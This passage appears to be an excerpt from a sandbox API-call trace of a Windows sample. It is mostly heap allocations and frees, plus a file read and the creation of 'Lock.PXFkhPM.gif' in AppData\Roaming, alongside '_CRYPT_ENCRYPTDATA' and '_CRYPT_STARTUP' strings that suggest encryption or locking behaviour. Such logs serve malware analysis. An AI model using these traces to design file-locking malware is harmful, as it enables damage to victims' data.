(HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0237.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0237.238] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0237.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0237.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0237.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0237.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0237.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0237.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0237.239] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.PXFkhPM.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.pxfkhpm.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0237.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0237.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0237.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0237.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0237.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0237.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0237.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0237.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0237.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0237.240] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0237.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0237.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0237.241] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0237.241] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0237.241] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0237.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0237.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0237.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0237.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0237.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0237.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0237.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0237.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0237.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0237.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0237.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0237.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0237.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0237.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0237.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe59020 [0237.243] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0237.243] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0237.246] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x245c, lpOverlapped=0x0) returned 1 [0237.247] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0237.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0237.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0237.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0237.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0237.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1245c) returned 0x2f14818 [0237.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe59020 | out: hHeap=0x970000) returned 1 [0237.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0237.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0237.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0237.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0237.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0237.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0237.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0237.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0237.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1245c) returned 0x2f26c80 [0237.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0237.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0237.251] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0237.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0237.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0237.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0237.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0237.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1245c) returned 0x2f14818 [0237.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0237.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0237.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0237.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0237.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0237.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0237.252] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0237.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0237.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0237.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0237.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0237.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0237.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0237.252] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0237.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0237.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0237.252] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0237.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0237.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0237.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0237.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0237.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0237.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0237.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0237.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0237.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1245c) returned 0x2f14818 [0237.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0237.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ef8 [0237.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0237.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0237.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0237.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550e8 [0237.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0237.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0237.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0237.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55018 [0237.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0237.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0237.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0237.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0237.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0237.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0237.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0237.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0237.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0237.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1245c) returned 0x2f390e8 [0237.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0237.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0237.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0237.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0237.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0237.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0237.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0237.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0237.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0237.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0237.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0237.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0237.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0237.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0237.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0237.255] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0237.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0237.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0237.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0237.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0237.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0237.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0237.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0237.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0237.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0237.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0237.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0237.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0237.256] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0237.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0237.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0237.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0237.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0237.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0237.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0237.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0237.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0237.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0237.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0237.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0237.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0237.257] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0237.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0237.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0237.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0237.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0237.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0237.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0237.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0237.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0237.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0237.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0237.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0237.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0237.257] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0237.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0237.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0237.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0237.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0237.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0237.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0237.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0237.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0237.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0237.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0237.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0237.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0237.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0237.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0237.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0237.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0237.258] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0237.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0237.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0237.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0237.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0237.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0237.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0237.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0237.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0237.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0237.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0237.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0237.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0237.259] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0237.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0237.259] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0237.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0237.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0237.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fc8 [0237.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0237.259] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0237.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0237.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04038 [0237.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0237.259] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0237.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04038 | out: hHeap=0x970000) returned 1 [0237.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51088 [0237.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0237.259] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0237.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0237.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0237.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0237.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0237.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0237.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0237.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0237.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0237.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0237.260] 